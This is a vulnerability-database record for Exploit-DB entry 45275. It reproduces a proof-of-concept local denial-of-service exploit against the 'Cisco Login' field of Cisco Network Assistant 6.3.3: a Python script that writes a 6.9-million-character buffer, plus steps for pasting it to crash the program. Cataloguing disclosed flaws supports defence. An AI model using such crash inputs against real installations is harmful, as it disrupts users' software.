ID

VAR-E-201808-0090


EDB ID

45275


TITLE

Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC) - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45275

DESCRIPTION

Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC).. dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 45275

AFFECTED PRODUCTS

vendor:ciscomodel:network assistantscope:eqversion:6.3.3

Trust: 1.6

sources: EXPLOIT-DB: 45275 // EDBNET: 99072

EXPLOIT

# Exploit Title: Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-27
# Vendor Homepage: https://www.cisco.com/
# Software Link : https://software.cisco.com/download/home/286277276/type/280775097/release/6.3.3
# Tested Version: 6.3.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code : python Cisco_Network_Assistant_6.3.3.py
# 2.- Open Cisco_Network_Assistant_6.3.3.txt and copy content to clipboard
# 3.- Open Cisco Network Assistant
# 4.- Authenticate to Cisco CCO
# 5.- Paste ClipBoard on "Cisco Login"
# 6.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 6900000
f = open ("Cisco_Network_Assistant_6.3.3.txt", "w")
f.write(buffer)
f.close()

Trust: 1.0

sources: EXPLOIT-DB: 45275

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 45275

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45275

TYPE

'Cisco Login' Denial of Service (PoC)

Trust: 1.6

sources: EXPLOIT-DB: 45275 // EDBNET: 99072

TAGS

tag:Denial of Service (DoS)

Trust: 1.0

sources: EXPLOIT-DB: 45275

CREDITS

Luis Martínez

Trust: 0.6

sources: EXPLOIT-DB: 45275

EXTERNAL IDS

db:EXPLOIT-DBid:45275

Trust: 1.6

db:EDBNETid:99072

Trust: 0.6

sources: EXPLOIT-DB: 45275 // EDBNET: 99072

REFERENCES

url:https://www.exploit-db.com/exploits/45275/

Trust: 0.6

sources: EDBNET: 99072

SOURCES

db:EXPLOIT-DBid:45275
db:EDBNETid:99072

LAST UPDATE DATE

2022-07-27T10:00:32.874000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:45275date:2018-08-28T00:00:00
db:EDBNETid:99072date:2018-08-28T00:00:00